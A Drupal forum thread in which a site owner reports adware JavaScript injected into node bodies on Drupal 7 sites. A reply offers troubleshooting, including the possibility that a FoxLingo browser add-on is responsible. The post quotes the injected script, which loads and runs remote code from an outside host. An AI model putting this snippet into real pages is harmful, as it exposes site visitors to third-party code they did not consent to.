Support for Drupal 7 is ending on 5 January 2025—it’s time to migrate to Drupal 10! Learn about the many benefits of Drupal 10 and find migration tools in our resource center.
By paugonzaleza on
Hi everyone, I have several drupal 7 sites, and a week ago, my sites are atacked by a robot that injects a text to body of nodes with a javascript, that shows advertisings.
Anonimous users can't register, or create, edir delete nodes.
I think this is a robot using a drupal bug to inject this.
the code injected is :
<script id="FoxLingoJs">
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>Anyone feel the same?
The sites were with version 7.15 but I have upgraded to 7.17 but it just happens too
I can list the modules used if is necesary, but am I the only that matter?
Thanks to all
Comments
First, are all of your
First, are all of your contrib modules up to date, too? Second, do any users have the ability to edit nodes? Perhaps their account was compromised. Third, do you have revisions turned on? if so, you will see when changes happened and can then cross-reference that with server logs.
One other possibility: FoxLingo is a Firefox plugin. Is it possible that this plugin is installed in your Firefox and is interjecting itself on pages that you visit? Try visiting the site with other browsers or on another computer and see if the code is still there.